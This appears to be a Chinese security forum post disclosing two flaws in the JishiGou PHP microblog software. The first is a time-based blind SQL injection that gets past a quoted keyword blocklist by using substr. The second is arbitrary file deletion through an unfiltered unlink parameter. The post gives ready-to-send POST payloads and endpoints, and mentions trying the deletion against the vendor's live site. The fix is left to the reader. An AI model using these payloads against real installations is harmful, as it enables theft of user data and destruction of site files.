0x1 盲注
0x2 任意文件删除


0x1 盲注
在modules/ajax/topic.mod.php中
 
function Group_fields()
       {
              $uid   = MEMBER_ID;
              $g_id  =  $this->Post['gid'];
              $touid =  $this->Post['touid'];
 
              $sql="SELECT * FROM ".TABLE_PREFIX.'group'." WHERE uid =".MEMBER_ID." and id=".$g_id;
              $query = $this->DatabaseHandler->Query($sql);
              $group_info=$query->GetRow();
 
                            $sql="SELECT `uid` FROM ".TABLE_PREFIX.'members'." WHERE uid=".$touid;
              $query = $this->DatabaseHandler->Query($sql);
              $member_info=$query->GetRow();
 
                            $sql="SELECT `touid`,`display` FROM ".TABLE_PREFIX.'groupfields'." WHERE touid
='{$touid}' and gid=".$g_id;
              $query = $this->DatabaseHandler->Query($sql);
              $fields_info=$query->GetRow();
 
              …...//省略 www.2cto.com
       }
 
$gid和$touid没做过滤，直接带入查询，但是查询之前经过了CheckQuery()检测，去除了一些关键字符，但是没有去除完整。
 
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
                     $_config['security']['querysafe']['dfunction']['1'] = 'hex';
                     $_config['security']['querysafe']['dfunction']['2'] = 'substring';
                     $_config['security']['querysafe']['dfunction']['4'] = 'ord';
                     $_config['security']['querysafe']['dfunction']['5'] = 'char';
                     $_config['security']['querysafe']['daction']['0'] = 'intooutfile';
                     $_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
                     $_config['security']['querysafe']['daction']['2'] = 'unionselect';
                     $_config['security']['querysafe']['daction']['4'] = 'unionall';
                     $_config['security']['querysafe']['daction']['5'] = 'uniondistinct';
                     $_config['security']['querysafe']['dnote']['0'] = '/'.'*';
                     $_config['security']['querysafe']['dnote']['1'] = '*/';
                     $_config['security']['querysafe']['dnote']['2'] = '#';
                     $_config['security']['querysafe']['dnote']['3'] = '--';
 
过滤了substring(其实我才知道mysql也可以用substring)，没过滤substr,
利用基于时间的盲注可以突破，最后构造一个post包，发送到ajax.php?code=group_fields
底下参数填写：
gid=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)&touid=34
 
最后执行的语句为：
SELECT * FROM jishigou_group WHERE uid =0 and id=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)
 
唉～～ 给那两个参数加个intval 把
 
0x2 任意文件删除
在modules/ajax/event.mod.php中
 
function onloadPic(){
       
       
        Load::lib('image');
       
        $image = new image();
              Load::lib('upload');
              unlink($this->Post['hid_pic']);
        if($_FILES['pic']['name']){
       …../省略
       }
       …../省略
}
 
hid_pic 没经过过滤，直接被unlink，这个漏洞需要至少普通用户的权限
所以我们构造一个post包，提交到/ajax.php?code=onloadPic&mod=event
底下的参数填写hid_pic=want_to_delete_file
即可把相应的文件删除～
本地测试删除data/install.lock成功，官网删除data/install.lock没成功？？ 权限问题？？？


修复方案：
do it your self

作者 yy520